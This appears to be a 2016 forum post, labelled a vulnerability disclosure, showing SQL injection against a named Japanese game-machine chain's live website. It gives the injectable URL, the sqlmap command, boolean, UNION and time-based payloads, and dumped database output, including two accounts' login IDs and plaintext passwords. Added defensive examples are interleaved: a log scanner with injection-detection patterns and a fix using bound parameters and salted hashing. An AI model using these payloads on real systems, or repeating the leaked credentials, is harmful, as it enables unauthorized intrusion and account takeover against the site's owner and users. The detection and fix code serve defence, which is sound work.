HanDs
Administrator

[July vulnerability disclosure] SQL injection in a large Japanese game-machine chain



As the title says.

Details:

Official site: http://www.atime.co.jp. Injectable URL: http://www.atime.co.jp/shop.php?sid=1; the sid parameter is injectable. Fed into sqlmap, the output is as follows:



C:\Python27\SQLMap>sqlmap.py -u "http://www.atime.co.jp/shop.php?sid=1" --dbs --time-sec 2

Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=1 AND 9458=9458

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: sid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,108,100,103,58),IFNULL(CAST(CHAR(108,114,110,112,85,120,87,79,116,69) AS CHAR),CHAR(32)),CHAR(58,113,121,111,58)), NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: sid=1 AND SLEEP(2)
---
[15:10:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[15:10:21] [INFO] fetching database names
available databases [1]:
[*] LA04659038-atime1227
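From the defender's side, the three probe shapes in the sqlmap output above (the tautology "AND 9458=9458", the "UNION ALL SELECT" with CHAR()-encoded marker strings, and "AND SLEEP(2)") all land in the web server's access log and are easy to pick out once the query string is URL-decoded. The following Python is an added example, not part of the original post or of sqlmap's output: it parses Apache combined-format lines (the report identifies Apache as the web server) and flags any request whose decoded parameter value matches one of those shapes. The log lines are constructed for the example, using an RFC 5737 documentation address, not real traffic from the site.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signatures for the probe families sqlmap reported against shop.php?sid=
# (boolean tautology "AND n=n", UNION ... SELECT, time-based SLEEP()) plus the
# CHAR(n,n,...) encoding sqlmap uses for its marker strings. Each rule is
# checked against the decoded value of every query parameter, not the raw URL.
SQLI_RULES = [
    ("boolean-tautology", re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I)),
    ("union-select",      re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("time-based",        re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("char-encoding",     re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I)),
]

# Apache combined log format; only client IP, timestamp and request path are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample (not real log data): one normal request, the three probe
# shapes from the sqlmap output above as they would be URL-encoded on the wire,
# and a second normal visitor.
SAMPLE_LOG = """\
203.0.113.10 - - [16/Jul/2016:15:10:20 +0900] "GET /shop.php?sid=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.10 - - [16/Jul/2016:15:10:21 +0900] "GET /shop.php?sid=1%20AND%209458%3D9458 HTTP/1.1" 200 5123 "-" "sqlmap/1.0"
203.0.113.10 - - [16/Jul/2016:15:10:22 +0900] "GET /shop.php?sid=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%28CHAR%2858%2C108%2C100%2C103%2C58%29%29%23 HTTP/1.1" 200 5210 "-" "sqlmap/1.0"
203.0.113.10 - - [16/Jul/2016:15:10:25 +0900] "GET /shop.php?sid=1%20AND%20SLEEP%282%29 HTTP/1.1" 200 5123 "-" "sqlmap/1.0"
203.0.113.11 - - [16/Jul/2016:15:11:02 +0900] "GET /shop.php?sid=12 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""


def analyze_request(path):
    """Return [(parameter, rule), ...] for every query parameter whose decoded value matches a rule."""
    query = urlsplit(path).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; a second pass catches double-encoded payloads (%2520 -> %20 -> space).
        value = unquote_plus(value)
        for rule, pattern in SQLI_RULES:
            if pattern.search(value):
                hits.append((name, rule))
    return hits


def scan_log(text):
    """Parse access-log lines and return one finding per request that matched at least one rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = analyze_request(m["path"])
        if hits:
            findings.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                             "rules": [rule for _, rule in hits]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], ",".join(f["rules"]), f["path"])
```

Three of the five constructed lines are flagged, all from the same source address within a few seconds, which is the burst pattern an automated scanner leaves; a real deployment would group findings per client and alert on the count, and would feed the same rules to the WAF or to the application's own request logging as a second layer behind the code fix.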



The database LA04659038-atime1227 contains the following 11 tables:

Database: `LA04659038-atime1227`
[11 tables]
+-------------------+
| atm_blog          |
| atm_blog_category |
| atm_blog_image    |
| atm_gallery       |
| atm_machine       |
| atm_news          |
| atm_ranking       |
| atm_recruit       |
| atm_setting       |
| atm_shop          |
| client_user       |
+-------------------+



Looking at the client_user table:



Database: `LA04659038-atime1227`
Table: client_user
[5 columns]
+------------------+--------------+
| Column           | Type         |
+------------------+--------------+
| registration_day | datetime     |
| user_id          | bigint(20)   |
| user_login_id    | varchar(30)  |
| user_login_pwd   | varchar(30)  |
| user_name        | varchar(255) |
+------------------+--------------+



Table data:



database '`LA04659038-atime1227`'
Database: `LA04659038-atime1227`
Table: client_user
[2 entries]
+---------+---------------+----------------+-----------+
| user_id | user_login_id | user_login_pwd | user_name |
+---------+---------------+----------------+-----------+
| 2       | taka          | takaherc       | HERC      |
| 4       | atime         | atime777       | ATIME     |
+---------+---------------+----------------+-----------+



Plaintext passwords.





Proof of vulnerability:




Fix plan:

Fix.
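The fix section above says only "Fix". As an added example (not code from the report or from the site), here is what that fix looks like in practice, shown in Python with an in-memory SQLite table standing in for the PHP/MySQL stack the report identifies: the concatenated query that sqlmap exploited next to a type-checked, parameterized one, and salted password hashing in place of the plaintext user_login_pwd column. The table and column names follow the report; the shop columns, the rows and the password are constructed.

```python
import hashlib
import hmac
import os
import sqlite3


def setup_db():
    """In-memory stand-in for the two tables named in the report, with constructed rows (no real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE atm_shop (sid INTEGER PRIMARY KEY, shop_name TEXT, address TEXT);
        CREATE TABLE client_user (user_id INTEGER PRIMARY KEY, user_login_id TEXT, user_login_pwd TEXT);
        INSERT INTO atm_shop VALUES (1, 'Shop One', 'Tokyo');
        INSERT INTO atm_shop VALUES (2, 'Shop Two', 'Osaka');
        INSERT INTO client_user VALUES (1, 'example-user', 'example-placeholder');
    """)
    return conn


def lookup_shop_vulnerable(conn, sid):
    """The pattern sqlmap found: the request parameter is pasted straight into the SQL text."""
    sql = "SELECT sid, shop_name, address FROM atm_shop WHERE sid = " + sid
    return conn.execute(sql).fetchall()


def lookup_shop_safe(conn, sid):
    """Hardened form: check the type, then bind the value instead of splicing it into the query."""
    try:
        sid_int = int(sid)
    except (TypeError, ValueError):
        raise ValueError("sid must be an integer shop id") from None
    # The SQL text is a constant; the driver sends the value separately, so it can never become SQL.
    return conn.execute("SELECT sid, shop_name, address FROM atm_shop WHERE sid = ?", (sid_int,)).fetchall()


def rejects(conn, sid):
    """True if the hardened lookup refuses the input outright."""
    try:
        lookup_shop_safe(conn, sid)
    except ValueError:
        return True
    return False


def hash_password(password, salt=None, iterations=200_000):
    """PBKDF2-HMAC-SHA256 with a random per-user salt; store this string, never the password itself."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    conn = setup_db()
    # Boolean-based blind: a true and a false condition change the row count of the vulnerable query.
    print("vuln 1 AND 1=1 ->", lookup_shop_vulnerable(conn, "1 AND 1=1"))
    print("vuln 1 AND 1=2 ->", lookup_shop_vulnerable(conn, "1 AND 1=2"))
    # UNION: rows from another table ride along in the same result set (column counts must match,
    # which is what the NULL padding in the report's payload achieves).
    print("vuln UNION     ->", lookup_shop_vulnerable(
        conn, "1 UNION ALL SELECT user_id, user_login_id, user_login_pwd FROM client_user"))
    print("safe 1         ->", lookup_shop_safe(conn, "1"))
    print("safe 1 AND 1=1 -> rejected:", rejects(conn, "1 AND 1=1"))
    stored = hash_password("example-placeholder")
    print(stored[:32] + "...", verify_password("example-placeholder", stored))
```

Both changes map directly onto the PHP side: prepared statements with bound parameters via PDO or mysqli for the query, and password_hash()/password_verify() for storage, on a PHP release that is still supported (the 5.2 branch the report identifies reached end of life years before 2016). One caveat a migration has to plan for: the report shows user_login_pwd as varchar(30), and a salted hash string is longer than that, so the column must be widened before the existing plaintext values are replaced.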


Tag: Japan
#1
Posted: 2016-7-16   |   Views: 0   |   Replies: 0